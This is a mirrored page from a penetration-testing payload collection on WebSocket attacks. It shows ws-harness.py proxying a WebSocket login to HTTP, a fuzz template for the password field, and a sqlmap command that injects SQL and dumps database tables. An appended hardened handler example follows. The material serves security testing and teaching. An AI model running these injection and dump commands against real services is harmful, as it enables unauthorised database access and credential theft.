mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
Web Sockets Attacks
The WebSocket protocol allows bidirectional, full-duplex communication between a client and a server.
Summary
Tools
Using ws-harness.py
Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
The content of the message should contain the [FUZZ] keyword.
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
You can then run any tool against the newly created web service, which acts as a proxy and tampers on the fly with the content of the message sent through the WebSocket.
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --tables --tamper=base64encode --dump
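Because a bridge like this lets any HTTP scanner reach the WebSocket handler, the handler needs the same input handling as an HTTP endpoint. The following is an added example, not code from the original page or from ws-harness: a hardened server-side handler for the auth_user/auth_pass message shown above. The table layout, function names, field-length limit and PBKDF2 parameters are assumptions made for the demo.

```python
import base64, binascii, hashlib, hmac, json, sqlite3

MAX_FIELD = 256  # assumed upper bound on an encoded field's length

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed in-memory user table (hypothetical schema) for the demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("test", salt, hash_pw("s3cret", salt)))
    return db

def decode_field(msg, key):
    """Return msg[key] base64-decoded as UTF-8, or None if missing or malformed."""
    value = msg.get(key)
    if not isinstance(value, str) or not 0 < len(value) <= MAX_FIELD:
        return None
    try:
        # validate=True rejects characters outside the base64 alphabet
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def handle_auth_message(db, raw):
    """Handle one text frame; returns 'ok', 'denied' or 'bad-request'."""
    try:
        msg = json.loads(raw)
    except json.JSONDecodeError:
        return "bad-request"
    if not isinstance(msg, dict):
        return "bad-request"
    user = decode_field(msg, "auth_user")
    password = decode_field(msg, "auth_pass")
    if user is None or password is None:
        return "bad-request"
    # Bound parameter: the decoded value is data, never part of the SQL text.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (user,)).fetchone()
    if row is None:
        return "denied"
    ok = hmac.compare_digest(hash_pw(password, row[0]), row[1])
    return "ok" if ok else "denied"
```

Malformed frames are rejected before they reach the database, and a value that decodes cleanly is only ever passed as a bound parameter.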